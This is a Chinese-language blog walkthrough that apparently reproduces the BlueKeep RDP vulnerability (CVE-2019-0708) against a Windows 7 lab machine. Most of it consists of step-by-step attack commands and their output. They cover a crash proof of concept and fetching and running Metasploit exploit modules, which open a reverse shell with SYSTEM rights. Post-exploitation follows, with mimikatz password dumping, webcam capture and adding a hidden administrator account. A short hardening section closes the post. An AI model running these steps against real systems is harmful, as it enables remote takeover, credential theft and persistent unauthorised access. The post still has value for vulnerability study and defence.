漏洞复现：”CVE_2019_0708 BlueKeep”

环境篇 <img />技术小贴 Windows7 ultimate sp1 x64 MSF 开启远程桌面： <img /> 关闭防火墙： <img /> 利用篇 早期蓝屏 这是早期漏洞利用POC! git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708 pip3 install impacket python3 crashpoc.py 192.168.173.136 32 #python3 crashpoc.py ip地址 系统类型 <img /> 注：以上POC，不需要关闭防火墙即可打穿WIN7！ 获取shell 下载攻击脚本： wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 导入攻击脚本： cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 漏洞探测： use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set rhosts 192.168.173.136 set threads 5 run [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 漏洞利用： reload_all #加载攻击脚本 search cve-2019-0708 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set rhosts 192.168.173.130 set rport 3389 set target 3 #因为我们使用的是VMware，所以可以使用target 3 exploit [*] Started reverse TCP handler on 192.168.173.1:4444 [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.173.136:3389 - Surfing channels ... [*] 192.168.173.136:3389 - Lobbing eggs ... [*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ... [*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800 session 1 session 1 'session' ڲⲿҲǿеij ļ C:Windowssystem32>whoami whoami nt authoritysystem #成功拿到Shell,并且为System权限 #第一次explloit导致Win7蓝屏，之后正常获取Shell target数值的说明： 根据指纹自动判断 真实机器 Virtual Box虚拟机 Vmware虚拟机 权限提升 meterpreter > getuid #获取uid meterpreter > screenshot #截图 meterpreter > webcam_scream #抓拍 meterpreter > load mimikatz #获取系统密码 meterpreter > wdigest #获取系统密码 rdesktop 192.168.173.138 #登录远程桌面 net user root$ root /add net localgroup administrators root$ /add 本次实验机器为win7，windows server 2008需要修改注册表，否则**蓝屏。 [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStationsRDP-TcpfDisableCam]值修改为0 加固篇 影响版本 Windows Server 2008 (R2) Windows 7 SP1 Windows Server 2003 Windows XP 临时加固 禁止掉3389远程端口 热补丁 参考：奇安信CVE-2019-0708漏洞热补丁工具使用手册 原创文章，作者：小嵘源码，如若转载，请注明出处：https://www.lcpttec.com/bluekeep/